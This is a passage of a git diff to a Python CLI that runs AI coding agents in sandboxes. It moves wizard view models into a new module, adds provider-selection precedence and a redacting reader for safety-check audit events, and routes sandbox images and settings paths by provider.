credential_status: str | None = None - - -@dataclass(frozen=True) -class TeamSelectionViewModel: - """View model for team selection prompts.""" - - title: str - subtitle: str | None - current_team: str | None - options: Sequence[TeamOption] - - -@dataclass(frozen=True) -class WorkspaceSourceOption: - """Workspace source option for selection prompts.""" - - source: WorkspaceSource - label: str - description: str - - -@dataclass(frozen=True) -class CwdContext: - """Current working directory context for workspace source selection. - - This dataclass captures the runtime state of the current working directory - so the UI layer can build appropriate presentation options. The command - layer gathers this data (via service functions), filters out suspicious - directories upstream, and the UI layer uses it to build picker options. - - Invariants: - - If cwd_context is None in a view model, cwd is suspicious or unavailable. - - If cwd_context is provided, the directory has passed suspicious checks. - - UI should show "Current directory" option iff cwd_context is not None. - - Args: - path: Absolute path to the current working directory. - name: Display name for the directory (typically the folder name). - is_git: Whether the directory is a git repository. - has_project_markers: Whether the directory has recognizable project markers. - """ - - path: str - name: str - is_git: bool - has_project_markers: bool - - -@dataclass(frozen=True) -class WorkspaceSummary: - """Workspace option summary for picker prompts.""" - - label: str - description: str - workspace: str - - -@dataclass(frozen=True) -class TeamRepoOption: - """Team repository option for selection prompts.""" - - name: str - description: str - url: str | None = None - local_path: str | None = None - - -@dataclass(frozen=True) -class QuickResumeOption: - """Quick resume option for selection prompts.""" - - option_id: str - label: str - description: str - is_new_session: bool = False - is_switch_team: bool = False - is_context: bool = False - context: WorkContext | None = None - - -@dataclass(frozen=True) -class QuickResumeViewModel: - """View model for quick resume selection prompts.""" - - title: str - subtitle: str | None - context_label: str | None - standalone: bool - effective_team: str | None - contexts: Sequence[WorkContext] - current_branch: str | None = None - - -@dataclass(frozen=True) -class WorkspaceSourceViewModel: - """View model for workspace source selection prompts. - - This view model carries data flags that the UI layer uses to build - presentation options. The application layer provides context about - the current directory and team repositories, but does not build - the actual picker options - that's the UI layer's responsibility. - - Invariants: - - cwd_context is None if the current directory is suspicious (UI should not show it). - - If options is empty, UI layer builds options from cwd_context/has_team_repos. - - Args: - title: Picker title text. - subtitle: Optional subtitle text. - context_label: Team context label (e.g., "Team: platform"). - standalone: Whether running in standalone mode (no org config). - allow_back: Whether back navigation is allowed. - has_team_repos: Whether team repositories are available. - cwd_context: Current directory context, or None if cwd is suspicious. - options: Prebuilt options (empty = UI builds from data flags). - """ - - title: str - subtitle: str | None - context_label: str | None - standalone: bool - allow_back: bool - has_team_repos: bool = False - cwd_context: CwdContext | None = None - options: Sequence[WorkspaceSourceOption] = () - - -@dataclass(frozen=True) -class WorkspacePickerViewModel: - """View model for workspace picker prompts.""" - - title: str - subtitle: str | None - context_label: str | None - standalone: bool - allow_back: bool - options: Sequence[WorkspaceSummary] - - -@dataclass(frozen=True) -class TeamRepoPickerViewModel: - """View model for team repository picker prompts.""" - - title: str - subtitle: str | None - context_label: str | None - standalone: bool - allow_back: bool - workspace_base: str - options: Sequence[TeamRepoOption] - - -StartWizardViewModel = ( - QuickResumeViewModel - | WorkspaceSourceViewModel - | WorkspacePickerViewModel - | TeamRepoPickerViewModel - | TeamSelectionViewModel - | None -) - - -@dataclass(frozen=True) -class StartWizardPrompt: - """Prompt returned for the start wizard UI layer. - - Invariants: - - Prompts are data-only and rendered at the UI edge. - """ - - step: StartWizardStep - request: ConfirmRequest | SelectRequest[object] | InputRequest - select_options: Sequence[SelectOption[object]] | None = None - view_model: StartWizardViewModel = None - allow_team_switch: bool = False - default_response: bool | None = None - - -@dataclass(frozen=True) -class StartWizardProgress: - """Non-terminal wizard state prompting user input.""" - - state: StartWizardState - prompt: StartWizardPrompt - - -StartWizardOutcome = StartWizardProgress | StartWizardState - - WORKSPACE_SOURCE_REQUEST_ID = "start-workspace-source" WORKSPACE_PICKER_REQUEST_ID = "start-workspace-picker" TEAM_SELECTION_REQUEST_ID = "start-team-selection" diff --git a/src/scc_cli/application/launch/wizard_models.py b/src/scc_cli/application/launch/wizard_models.py new file mode 100644 index 0000000..d9e29de --- /dev/null +++ b/src/scc_cli/application/launch/wizard_models.py @@ -0,0 +1,215 @@ +"""ViewModel and Option dataclasses for the start wizard UI layer.""" + +from __future__ import annotations + +from collections.abc import Sequence +from dataclasses import dataclass + +from scc_cli.application.interaction_requests import ( + ConfirmRequest, + InputRequest, + SelectOption, + SelectRequest, +) +from scc_cli.application.launch.start_wizard import ( + StartWizardState, + StartWizardStep, + WorkspaceSource, +) +from scc_cli.contexts import WorkContext + + +@dataclass(frozen=True) +class TeamOption: + """Team option for selection prompts.""" + + name: str + description: str = "" + credential_status: str | None = None + + +@dataclass(frozen=True) +class TeamSelectionViewModel: + """View model for team selection prompts.""" + + title: str + subtitle: str | None + current_team: str | None + options: Sequence[TeamOption] + + +@dataclass(frozen=True) +class WorkspaceSourceOption: + """Workspace source option for selection prompts.""" + + source: WorkspaceSource + label: str + description: str + + +@dataclass(frozen=True) +class CwdContext: + """Current working directory context for workspace source selection. + + This dataclass captures the runtime state of the current working directory + so the UI layer can build appropriate presentation options. The command + layer gathers this data (via service functions), filters out suspicious + directories upstream, and the UI layer uses it to build picker options. + + Invariants: + - If cwd_context is None in a view model, cwd is suspicious or unavailable. + - If cwd_context is provided, the directory has passed suspicious checks. + - UI should show "Current directory" option iff cwd_context is not None. + + Args: + path: Absolute path to the current working directory. + name: Display name for the directory (typically the folder name). + is_git: Whether the directory is a git repository. + has_project_markers: Whether the directory has recognizable project markers. + """ + + path: str + name: str + is_git: bool + has_project_markers: bool + + +@dataclass(frozen=True) +class WorkspaceSummary: + """Workspace option summary for picker prompts.""" + + label: str + description: str + workspace: str + + +@dataclass(frozen=True) +class TeamRepoOption: + """Team repository option for selection prompts.""" + + name: str + description: str + url: str | None = None + local_path: str | None = None + + +@dataclass(frozen=True) +class QuickResumeOption: + """Quick resume option for selection prompts.""" + + option_id: str + label: str + description: str + is_new_session: bool = False + is_switch_team: bool = False + is_context: bool = False + context: WorkContext | None = None + + +@dataclass(frozen=True) +class QuickResumeViewModel: + """View model for quick resume selection prompts.""" + + title: str + subtitle: str | None + context_label: str | None + standalone: bool + effective_team: str | None + contexts: Sequence[WorkContext] + current_branch: str | None = None + + +@dataclass(frozen=True) +class WorkspaceSourceViewModel: + """View model for workspace source selection prompts. + + This view model carries data flags that the UI layer uses to build + presentation options. The application layer provides context about + the current directory and team repositories, but does not build + the actual picker options - that's the UI layer's responsibility. + + Invariants: + - cwd_context is None if the current directory is suspicious (UI should not show it). + - If options is empty, UI layer builds options from cwd_context/has_team_repos. + + Args: + title: Picker title text. + subtitle: Optional subtitle text. + context_label: Team context label (e.g., "Team: platform"). + standalone: Whether running in standalone mode (no org config). + allow_back: Whether back navigation is allowed. + has_team_repos: Whether team repositories are available. + cwd_context: Current directory context, or None if cwd is suspicious. + options: Prebuilt options (empty = UI builds from data flags). + """ + + title: str + subtitle: str | None + context_label: str | None + standalone: bool + allow_back: bool + has_team_repos: bool = False + cwd_context: CwdContext | None = None + options: Sequence[WorkspaceSourceOption] = () + + +@dataclass(frozen=True) +class WorkspacePickerViewModel: + """View model for workspace picker prompts.""" + + title: str + subtitle: str | None + context_label: str | None + standalone: bool + allow_back: bool + options: Sequence[WorkspaceSummary] + + +@dataclass(frozen=True) +class TeamRepoPickerViewModel: + """View model for team repository picker prompts.""" + + title: str + subtitle: str | None + context_label: str | None + standalone: bool + allow_back: bool + workspace_base: str + options: Sequence[TeamRepoOption] + + +StartWizardViewModel = ( + QuickResumeViewModel + | WorkspaceSourceViewModel + | WorkspacePickerViewModel + | TeamRepoPickerViewModel + | TeamSelectionViewModel + | None +) + + +@dataclass(frozen=True) +class StartWizardPrompt: + """Prompt returned for the start wizard UI layer. + + Invariants: + - Prompts are data-only and rendered at the UI edge. + """ + + step: StartWizardStep + request: ConfirmRequest | SelectRequest[object] | InputRequest + select_options: Sequence[SelectOption[object]] | None = None + view_model: StartWizardViewModel = None + allow_team_switch: bool = False + default_response: bool | None = None + + +@dataclass(frozen=True) +class StartWizardProgress: + """Non-terminal wizard state prompting user input.""" + + state: StartWizardState + prompt: StartWizardPrompt + + +StartWizardOutcome = StartWizardProgress | StartWizardState diff --git a/src/scc_cli/application/personal_profile_policy.py b/src/scc_cli/application/personal_profile_policy.py index 7f6dd49..dc1d70a 100644 --- a/src/scc_cli/application/personal_profile_policy.py +++ b/src/scc_cli/application/personal_profile_policy.py @@ -11,6 +11,7 @@ validate_stdio_server, ) from scc_cli.core.enums import MCPServerType, TargetType +from scc_cli.ports.config_models import NormalizedOrgConfig @dataclass(frozen=True) @@ -24,11 +25,13 @@ class ProfilePolicySkip: def filter_personal_profile_settings( personal_settings: dict[str, Any], - org_config: dict[str, Any], + org_config: dict[str, Any] | NormalizedOrgConfig, ) -> tuple[dict[str, Any], list[ProfilePolicySkip]]: """Filter personal profile settings against org security blocks.""" - security = org_config.get("security", {}) - blocked_plugins = security.get("blocked_plugins", []) + if isinstance(org_config, dict): + org_config = NormalizedOrgConfig.from_dict(org_config) + + blocked_plugins = list(org_config.security.blocked_plugins) if not personal_settings or not blocked_plugins: return personal_settings, [] @@ -74,14 +77,16 @@ def filter_personal_profile_settings( def filter_personal_profile_mcp( personal_mcp: dict[str, Any], - org_config: dict[str, Any], + org_config: dict[str, Any] | NormalizedOrgConfig, ) -> tuple[dict[str, Any], list[ProfilePolicySkip]]: """Filter personal profile MCP servers against org security blocks.""" if not personal_mcp: return personal_mcp, [] - security = org_config.get("security", {}) - blocked_mcp_servers = security.get("blocked_mcp_servers", []) + if isinstance(org_config, dict): + org_config = NormalizedOrgConfig.from_dict(org_config) + + blocked_mcp_servers = list(org_config.security.blocked_mcp_servers) servers_raw = personal_mcp.get("mcpServers") if not isinstance(servers_raw, dict): return personal_mcp, [] diff --git a/src/scc_cli/application/provider_selection.py b/src/scc_cli/application/provider_selection.py new file mode 100644 index 0000000..00a5cef --- /dev/null +++ b/src/scc_cli/application/provider_selection.py @@ -0,0 +1,67 @@ +"""Pure provider selection precedence for setup and launch flows.""" + +from __future__ import annotations + +from dataclasses import dataclass +from typing import Literal + +from scc_cli.core.provider_resolution import KNOWN_PROVIDERS, resolve_active_provider + +ProviderSelectionSource = Literal[ + "explicit", + "resume", + "workspace_last_used", + "global_preferred", +] + + +@dataclass(frozen=True) +class ProviderSelection: + """Resolved provider together with the source that selected it.""" + + provider_id: str + source: ProviderSelectionSource + + +def resolve_provider_preference( + *, + cli_flag: str | None, + resume_provider: str | None, + workspace_last_used: str | None, + global_preferred: str | None, + allowed_providers: tuple[str, ...] = (), +) -> ProviderSelection | None: + """Resolve the highest-precedence provider preference. + + Returns ``None`` when no preference exists or when the global preference is + the explicit sentinel ``"ask"``. An explicit ``"ask"`` preference + intentionally suppresses workspace last-used auto-selection so the operator + is prompted whenever multiple providers are viable. + """ + if cli_flag is not None: + return ProviderSelection( + provider_id=resolve_active_provider(cli_flag, None, allowed_providers), + source="explicit", + ) + if resume_provider is not None: + return ProviderSelection( + provider_id=resolve_active_provider(resume_provider, None, allowed_providers), + source="resume", + ) + if global_preferred == "ask": + return None + if workspace_last_used is not None: + return ProviderSelection( + provider_id=resolve_active_provider(workspace_last_used, None, allowed_providers), + source="workspace_last_used", + ) + if global_preferred is None: + return None + if global_preferred not in KNOWN_PROVIDERS: + raise ValueError( + f"Unknown provider '{global_preferred}'. Known providers: {', '.join(KNOWN_PROVIDERS)}" + ) + return ProviderSelection( + provider_id=resolve_active_provider(global_preferred, None, allowed_providers), + source="global_preferred", + ) diff --git a/src/scc_cli/application/safety_audit.py b/src/scc_cli/application/safety_audit.py new file mode 100644 index 0000000..a48001c --- /dev/null +++ b/src/scc_cli/application/safety_audit.py @@ -0,0 +1,266 @@ +"""Bounded reader for safety-check events in the durable JSONL audit sink.""" + +from __future__ import annotations + +import json +from dataclasses import asdict, dataclass +from pathlib import Path +from typing import Any + +from scc_cli import config +from scc_cli.application.launch.audit_log import _tail_lines + +DEFAULT_SAFETY_AUDIT_LIMIT = 10 +DEFAULT_SCAN_LINE_FLOOR = 50 + + +@dataclass(frozen=True) +class SafetyAuditEventRecord: + """One parsed safety-check event from the recent scan window.""" + + line_number: int + event_type: str + message: str + severity: str + occurred_at: str + command: str | None + verdict_allowed: str | None + matched_rule: str | None + provider_id: str | None + metadata: dict[str, Any] + + +@dataclass(frozen=True) +class SafetyAuditDiagnostics: + """Redaction-safe summary of recent safety-check audit state.""" + + sink_path: str + state: str + requested_limit: int + scanned_line_count: int + malformed_line_count: int + last_malformed_line: int | None + recent_events: tuple[SafetyAuditEventRecord, ...] + last_blocked: SafetyAuditEventRecord | None + blocked_count: int + allowed_count: int + error: str | None = None + + def to_dict(self) -> dict[str, Any]: + """Return a JSON-serializable payload.""" + return asdict(self) + + +def read_safety_audit_diagnostics( + *, + audit_path: Path | None = None, + limit: int = DEFAULT_SAFETY_AUDIT_LIMIT, + redact_paths: bool = True, +) -> SafetyAuditDiagnostics: + """Read a bounded, redaction-safe summary of recent safety-check events.""" + resolved_path = audit_path or config.LAUNCH_AUDIT_FILE + requested_limit = max(limit, 0) + sink_path = _redact_string(str(resolved_path), redact_paths=redact_paths) + + if not resolved_path.exists(): + return SafetyAuditDiagnostics( + sink_path=sink_path, + state="unavailable", + requested_limit=requested_limit, + scanned_line_count=0, + malformed_line_count=0, + last_malformed_line=None, + recent_events=(), + last_blocked=None, + blocked_count=0, + allowed_count=0, + ) + + try: + if not resolved_path.is_file(): + raise OSError(f"{resolved_path} is not a file") + raw_lines = _tail_lines(resolved_path, max_lines=_scan_line_limit(requested_limit)) + except OSError as exc: + return SafetyAuditDiagnostics( + sink_path=sink_path, + state="unavailable", + requested_limit=requested_limit, + scanned_line_count=0, + malformed_line_count=0, + last_malformed_line=None, + recent_events=(), + last_blocked=None, + blocked_count=0, + allowed_count=0, + error=str(exc), + ) + + if len(raw_lines) == 0: + state = ( + "available" if requested_limit == 0 and resolved_path.stat().st_size > 0 else "empty" + ) + return SafetyAuditDiagnostics( + sink_path=sink_path, + state=state, + requested_limit=requested_limit, + scanned_line_count=0, + malformed_line_count=0, + last_malformed_line=None, + recent_events=(), + last_blocked=None, + blocked_count=0, + allowed_count=0, + ) + + safety_events: list[SafetyAuditEventRecord] = [] + last_blocked: SafetyAuditEventRecord | None = None + blocked_count = 0 + allowed_count = 0 + malformed_line_count = 0 + last_malformed_line: int | None = None + + for line_number, raw_line in enumerate(raw_lines, start=1): + record = _parse_safety_record( + raw_line, + line_number=line_number, + redact_paths=redact_paths, + ) + if record is None: + # Either malformed or not a safety.check event — distinguish. + if _is_parseable_non_safety(raw_line): + continue + malformed_line_count += 1 + last_malformed_line = line_number + continue + + safety_events.append(record) + + if record.verdict_allowed == "false" or record.verdict_allowed is False: + blocked_count += 1 + last_blocked = record + else: + allowed_count += 1 + + limited_events = ( + tuple(reversed(safety_events[-requested_limit:])) if requested_limit > 0 else () + ) + + return SafetyAuditDiagnostics( + sink_path=sink_path, + state="available", + requested_limit=requested_limit, + scanned_line_count=len(raw_lines), + malformed_line_count=malformed_line_count, + last_malformed_line=last_malformed_line, + recent_events=limited_events, + last_blocked=last_blocked, + blocked_count=blocked_count, + allowed_count=allowed_count, + ) + + +def _scan_line_limit(limit: int) -> int: + if limit <= 0: + return 0 + return max(limit * 4, DEFAULT_SCAN_LINE_FLOOR) + + +def _is_parseable_non_safety(raw_line: str) -> bool: + """Return True when the line is valid JSON but not a safety.check event.""" + if raw_line.strip() == "": + return True + try: + payload = json.loads(raw_line) + except json.JSONDecodeError: + return False + if not isinstance(payload, dict): + return False + event_type = payload.get("event_type") + return isinstance(event_type, str) and event_type != "safety.check" + + +def _parse_safety_record( + raw_line: str, + *, + line_number: int, + redact_paths: bool, +) -> SafetyAuditEventRecord | None: + """Parse a raw JSONL line; return a record only for safety.check events.""" + if raw_line.strip() == "": + return None + + try: + payload = json.loads(raw_line) + except json.JSONDecodeError: + return None + + if not isinstance(payload, dict): + return None + + event_type = payload.get("event_type") + if not isinstance(event_type, str) or event_type != "safety.check": + return None + + sanitized = _redact_value(payload, redact_paths=redact_paths) + if not isinstance(sanitized, dict): + return None + + message = sanitized.get("message") + severity = sanitized.get("severity") + occurred_at = sanitized.get("occurred_at") + metadata = sanitized.get("metadata") + + if not isinstance(message, str): + return None + if not isinstance(severity, str): + return None + if not isinstance(occurred_at, str): + return None + if not isinstance(metadata, dict): + metadata = {} + + command = metadata.get("command") + if command is not None and not isinstance(command, str): + command = None + + verdict_allowed = metadata.get("verdict_allowed") + if verdict_allowed is not None: + verdict_allowed = str(verdict_allowed) + + matched_rule = metadata.get("matched_rule") + if matched_rule is not None and not isinstance(matched_rule, str): + matched_rule = None + + provider_id = metadata.get("provider_id") + if provider_id is not None and not isinstance(provider_id, str): + provider_id = None + + return SafetyAuditEventRecord( + line_number=line_number, + event_type=event_type, + message=message, + severity=severity, + occurred_at=occurred_at, + command=command, + verdict_allowed=verdict_allowed, + matched_rule=matched_rule, + provider_id=provider_id, + metadata=metadata, + ) + + +def _redact_value(value: Any, *, redact_paths: bool) -> Any: + if isinstance(value, str): + return _redact_string(value, redact_paths=redact_paths) + if isinstance(value, dict): + return {key: _redact_value(item, redact_paths=redact_paths) for key, item in value.items()} + if isinstance(value, list): + return [_redact_value(item, redact_paths=redact_paths) for item in value] + return value + + +def _redact_string(value: str, *, redact_paths: bool) -> str: + if not redact_paths: + return value + home = str(Path.home()) + return value.replace(home, "~") if home in value else value diff --git a/src/scc_cli/application/sessions/use_cases.py b/src/scc_cli/application/sessions/use_cases.py index 464e094..fc3791e 100644 --- a/src/scc_cli/application/sessions/use_cases.py +++ b/src/scc_cli/application/sessions/use_cases.py @@ -50,6 +50,7 @@ def list_recent(self, session_filter: SessionFilter) -> SessionListResult: last_used=record.last_used, container_name=record.container_name, branch=record.branch, + provider_id=record.provider_id, ) for record in sessions ] @@ -64,6 +65,7 @@ def record_session( session_name: str | None = None, container_name: str | None = None, branch: str | None = None, + provider_id: str | None = None, ) -> SessionRecord: """Record a session creation or update. @@ -73,6 +75,7 @@ def record_session( session_name: Optional session display name. container_name: Optional container name. branch: Optional git branch name. + provider_id: Provider identifier (e.g. 'claude', 'codex') or None. Returns: SessionRecord that was written. @@ -82,6 +85,9 @@ def record_session( sessions = self.store.load_sessions() existing_index = _find_session_index(sessions, workspace, branch) created_at = sessions[existing_index].created_at if existing_index is not None else now + schema_ver = ( + sessions[existing_index].schema_version if existing_index is not None else 2 + ) record = SessionRecord( workspace=workspace, team=team, @@ -90,6 +96,8 @@ def record_session( branch=branch, last_used=now, created_at=created_at, + provider_id=provider_id, + schema_version=schema_ver, ) if existing_index is not None: sessions[existing_index] = record @@ -125,6 +133,7 @@ def update_session_container( branch=record.branch, last_used=now, created_at=record.created_at, + provider_id=record.provider_id, schema_version=record.schema_version, ) sessions[sessions.index(record)] = updated @@ -152,10 +161,14 @@ def _filter_sessions( session_filter: SessionFilter, ) -> list[SessionRecord]: if session_filter.include_all: - return sessions - if session_filter.team is None: - return [record for record in sessions if record.team is None] - return [record for record in sessions if record.team == session_filter.team] + result = sessions + elif session_filter.team is None: + result = [record for record in sessions if record.team is None] + else: + result = [record for record in sessions if record.team == session_filter.team] + if session_filter.provider_id is not None: + result = [record for record in result if record.provider_id == session_filter.provider_id] + return result def _generate_session_name(record: SessionRecord) -> str: diff --git a/src/scc_cli/application/settings/use_cases.py b/src/scc_cli/application/settings/use_cases.py index 880352e..837c8ca 100644 --- a/src/scc_cli/application/settings/use_cases.py +++ b/src/scc_cli/application/settings/use_cases.py @@ -6,6 +6,11 @@ from pathlib import Path from scc_cli import config +from scc_cli.application.support_bundle import ( + SupportBundleRequest, + build_default_support_bundle_dependencies, + create_support_bundle, +) from scc_cli.core.personal_profiles import ( compute_fingerprints, compute_structured_diff, @@ -39,7 +44,7 @@ reset_config, reset_exceptions, ) -from scc_cli.support_bundle import create_bundle +from scc_cli.marketplace.managed import load_managed_state from .models import ( ConfirmationKind, @@ -495,7 +500,9 @@ def _apply_profile_apply(workspace: Path) -> SettingsActionResult: current_mcp = load_workspace_mcp(workspace) or {} if profile.settings: - merged_settings = merge_personal_settings(workspace, current_settings, profile.settings) + merged_settings = merge_personal_settings( + workspace, current_settings, profile.settings, managed_state_loader=load_managed_state + ) write_workspace_settings(workspace, merged_settings) if profile.mcp: @@ -685,7 +692,15 @@ def _apply_support_bundle(request: SettingsChangeRequest) -> SettingsActionResul error="missing payload", ) - create_bundle(output_path=payload.output_path, redact_paths_flag=payload.redact_paths) + support_request = SupportBundleRequest( + output_path=payload.output_path, + redact_paths=payload.redact_paths, + workspace_path=None, + ) + create_support_bundle( + support_request, + dependencies=build_default_support_bundle_dependencies(), + ) info = SupportBundleInfo(output_path=payload.output_path) return SettingsActionResult( diff --git a/src/scc_cli/application/start_session.py b/src/scc_cli/application/start_session.py index 83ffc87..49c8a7e 100644 --- a/src/scc_cli/application/start_session.py +++ b/src/scc_cli/application/start_session.py @@ -2,6 +2,7 @@ from __future__ import annotations +import logging from dataclasses import dataclass from pathlib import Path from typing import Any @@ -16,17 +17,28 @@ sync_marketplace_settings, ) from scc_cli.application.workspace import ResolveWorkspaceRequest, resolve_workspace -from scc_cli.core.constants import AGENT_CONFIG_DIR, SANDBOX_IMAGE -from scc_cli.core.errors import WorkspaceNotFoundError +from scc_cli.core.bundle_resolver import BundleResolutionResult, resolve_render_plan +from scc_cli.core.contracts import AgentLaunchSpec, RenderArtifactsResult, RuntimeInfo +from scc_cli.core.destination_registry import resolve_destination_sets +from scc_cli.core.errors import RendererError, WorkspaceNotFoundError +from scc_cli.core.provider_registry import get_runtime_spec from scc_cli.core.workspace import ResolverResult +from scc_cli.ports.agent_provider import AgentProvider from scc_cli.ports.agent_runner import AgentRunner +from scc_cli.ports.audit_event_sink import AuditEventSink from scc_cli.ports.clock import Clock +from scc_cli.ports.config_models import NormalizedOrgConfig from scc_cli.ports.filesystem import Filesystem from scc_cli.ports.git_client import GitClient from scc_cli.ports.models import AgentSettings, MountSpec, SandboxHandle, SandboxSpec from scc_cli.ports.remote_fetcher import RemoteFetcher from scc_cli.ports.sandbox_runtime import SandboxRuntime +logger = logging.getLogger(__name__) + +# Claude-specific fallback image (used when no RuntimeInfo is available) +_DOCKER_DESKTOP_CLAUDE_IMAGE = "docker/sandbox-templates:claude-code" + @dataclass(frozen=True) class StartSessionDependencies: @@ -40,6 +52,9 @@ class StartSessionDependencies: sandbox_runtime: SandboxRuntime resolve_effective_config: EffectiveConfigResolver materialize_marketplace: MarketplaceMaterializer + agent_provider: AgentProvider | None = None + audit_event_sink: AuditEventSink | None = None + runtime_info: RuntimeInfo | None = None @dataclass(frozen=True) @@ -57,8 +72,10 @@ class StartSessionRequest: standalone: bool dry_run: bool allow_suspicious: bool - org_config: dict[str, Any] | None + org_config: NormalizedOrgConfig | None + raw_org_config: dict[str, Any] | None = None org_config_url: str | None = None + provider_id: str | None = None @dataclass(frozen=True) @@ -77,6 +94,9 @@ class StartSessionPlan: sync_error_message: str | None agent_settings: AgentSettings | None sandbox_spec: SandboxSpec | None + agent_launch_spec: AgentLaunchSpec | None = None + bundle_render_results: tuple[RenderArtifactsResult, ...] = () + bundle_render_error: str | None = None def prepare_start_session( @@ -87,22 +107,60 @@ def prepare_start_session( """Prepare launch data and settings for a session. This resolves workspace context, computes config, syncs marketplace settings, - and builds the sandbox specification. + resolves bundle render plans, renders provider-native artifacts, and builds + the sandbox specification. """ resolver_result = _resolve_workspace_context(request) effective_config = _compute_effective_config(request) sync_result, sync_error_message = sync_marketplace_settings_for_start(request, dependencies) + # Resolve provider_id for settings path routing. + # D032: fail-closed — active launch must not silently default to Claude. + # Prefer request.provider_id; fall back to the wired provider's identity. + if request.provider_id: + _provider_id = request.provider_id + elif dependencies.agent_provider is not None: + _provider_id = dependencies.agent_provider.capability_profile().provider_id + else: + from scc_cli.core.errors import InvalidProviderError + from scc_cli.core.provider_registry import PROVIDER_REGISTRY + + raise InvalidProviderError( + provider_id="(none)", + known_providers=tuple(PROVIDER_REGISTRY.keys()), + ) agent_settings = _build_agent_settings( sync_result, dependencies.agent_runner, effective_config=effective_config, + provider_id=_provider_id, + workspace_path=request.workspace_path, + is_resume=request.resume, + ) + + # ── Bundle pipeline: resolve plans → render artifacts ───────────────── + bundle_render_results, bundle_render_error = _render_bundle_artifacts( + request=request, + workspace=request.workspace_path, + dependencies=dependencies, ) + current_branch = _resolve_current_branch(request.workspace_path, dependencies.git_client) + + # Build agent_launch_spec first so its argv can flow into sandbox_spec. + agent_launch_spec = _build_agent_launch_spec( + request=request, + agent_settings=agent_settings, + dependencies=dependencies, + ) + agent_argv = list(agent_launch_spec.argv) if agent_launch_spec is not None else None sandbox_spec = _build_sandbox_spec( request=request, resolver_result=resolver_result, effective_config=effective_config, agent_settings=agent_settings, + runtime_info=dependencies.runtime_info, + agent_provider=dependencies.agent_provider, + agent_argv=agent_argv, ) return StartSessionPlan( resolver_result=resolver_result, @@ -117,6 +175,9 @@ def prepare_start_session( sync_error_message=sync_error_message, agent_settings=agent_settings, sandbox_spec=sandbox_spec, + agent_launch_spec=agent_launch_spec, + bundle_render_results=bundle_render_results, + bundle_render_error=bundle_render_error, ) @@ -160,6 +221,14 @@ def sync_marketplace_settings_for_start( ) -> tuple[SyncResult | None, str | None]: """Sync marketplace settings for a start session. + **Transitional:** This function predates the governed-artifact bundle + pipeline (M005). It syncs legacy marketplace plugin/MCP definitions + that are not yet expressed as governed artifacts. Once all team + config surfaces are migrated to the bundle pipeline + (``_render_bundle_artifacts``), this function and its call sites can + be removed. Until then, both paths run: marketplace sync first, + then bundle rendering, with the bundle pipeline as the canonical path. + Invariants: - Skips syncing in dry-run, offline, or standalone modes. - Uses the same sync path as start session preparation. @@ -173,7 +242,7 @@ def sync_marketplace_settings_for_start( """ if request.dry_run or request.offline or request.standalone: return None, None - if request.org_config is None or request.team is None: + if request.raw_org_config is None or request.team is None: return None, None sync_dependencies = SyncMarketplaceDependencies( filesystem=dependencies.filesystem, @@ -185,7 +254,7 @@ def sync_marketplace_settings_for_start( try: result = sync_marketplace_settings( project_dir=request.workspace_path, - org_config_data=request.org_config, + org_config_data=request.raw_org_config, team_id=request.team, org_config_url=request.org_config_url, write_to_workspace=False, @@ -202,20 +271,46 @@ def _build_agent_settings( agent_runner: AgentRunner, *, effective_config: EffectiveConfig | None, + provider_id: str, + workspace_path: Path | None = None, + is_resume: bool = False, ) -> AgentSettings | None: + """Build agent settings for injection into the container. + + D038/D042: On every fresh launch (not resume), SCC deterministically + writes the SCC-managed config layer — even when logically empty. This + ensures no stale team/workspace config persists from a prior launch. + On resume, the existing config is left in place (belongs to the session + being resumed), so we return None to skip injection. + """ + # D038: on resume, leave existing container config untouched. + if is_resume: + return None + settings: dict[str, Any] | None = None if sync_result and sync_result.rendered_settings: settings = dict(sync_result.rendered_settings) if effective_config: - from scc_cli.claude_adapter import merge_mcp_servers + from scc_cli.bootstrap import merge_mcp_servers settings = merge_mcp_servers(settings, effective_config) - if not settings: - return None - - settings_path = Path("/home/agent") / AGENT_CONFIG_DIR / "settings.json" + # D038/D042: on fresh launch, always produce a settings file — even if + # the dict is empty. This overwrites any stale config left in the + # persistent volume from a prior launch (e.g. governed→standalone, + # teamA→teamB transitions). + if settings is None: + settings = {} + + spec = get_runtime_spec(provider_id) + # D041: route settings path by scope. + # "home" → /home/agent/ (Claude: user-level config) + # "workspace" → / (Codex: project-scoped config) + if spec.settings_scope == "workspace" and workspace_path is not None: + settings_path = workspace_path / spec.settings_path + else: + settings_path = Path("/home/agent") / spec.settings_path return agent_runner.build_settings(settings, path=settings_path) @@ -234,19 +329,178 @@ def _build_sandbox_spec( resolver_result: ResolverResult, effective_config: EffectiveConfig | None, agent_settings: AgentSettings | None, + runtime_info: RuntimeInfo | None = None, + agent_provider: AgentProvider | None = None, + agent_argv: list[str] | None = None, ) -> SandboxSpec | None: if request.dry_run: return None + + # Route image, data volume, and config dir by provider_id on OCI backend. + # D032: fail-closed — missing provider wiring raises, never falls back to Claude. + if runtime_info is not None and runtime_info.preferred_backend == "oci": + if agent_provider is None: + from scc_cli.core.errors import ProviderNotReadyError + + raise ProviderNotReadyError( + provider_id="(none)", + user_message="No agent provider wired for OCI launch.", + suggested_action="Ensure a provider is selected via --provider or config.", + ) + resolved_pid = agent_provider.capability_profile().provider_id + spec = get_runtime_spec(resolved_pid) + image = spec.image_ref + data_volume = spec.data_volume + config_dir = spec.config_dir + else: + if agent_provider is not None: + resolved_pid = agent_provider.capability_profile().provider_id + else: + resolved_pid = "" + image = _DOCKER_DESKTOP_CLAUDE_IMAGE + data_volume = "" + config_dir = "" + + # Resolve provider destination sets for OCI backend. + from scc_cli.core.contracts import DestinationSet + + destination_sets: tuple[DestinationSet, ...] = () + if ( + agent_provider is not None + and runtime_info is not None + and runtime_info.preferred_backend == "oci" + ): + profile = agent_provider.capability_profile() + if profile.required_destination_set: + destination_sets = resolve_destination_sets((profile.required_destination_set,)) + return SandboxSpec( - image=SANDBOX_IMAGE, + image=image, workspace_mount=MountSpec( source=resolver_result.mount_root, target=resolver_result.mount_root, ), workdir=Path(resolver_result.container_workdir), network_policy=effective_config.network_policy if effective_config else None, + destination_sets=destination_sets, continue_session=request.resume, force_new=request.fresh, agent_settings=agent_settings, - org_config=request.org_config, + org_config=request.raw_org_config, + agent_argv=agent_argv or [], + data_volume=data_volume, + config_dir=config_dir, + provider_id=resolved_pid, + ) + + +def _render_bundle_artifacts( + *, + request: StartSessionRequest, + workspace: Path, + dependencies: StartSessionDependencies, +) -> tuple[tuple[RenderArtifactsResult, ...], str | None]: + """Resolve bundle render plans and render provider-native artifacts. + + Skips bundle resolution when preconditions aren't met (no org config, + no team, no provider, or dry-run/offline/standalone modes). + + In fail-closed mode, RendererError propagates as a captured error message + on the StartSessionPlan so the 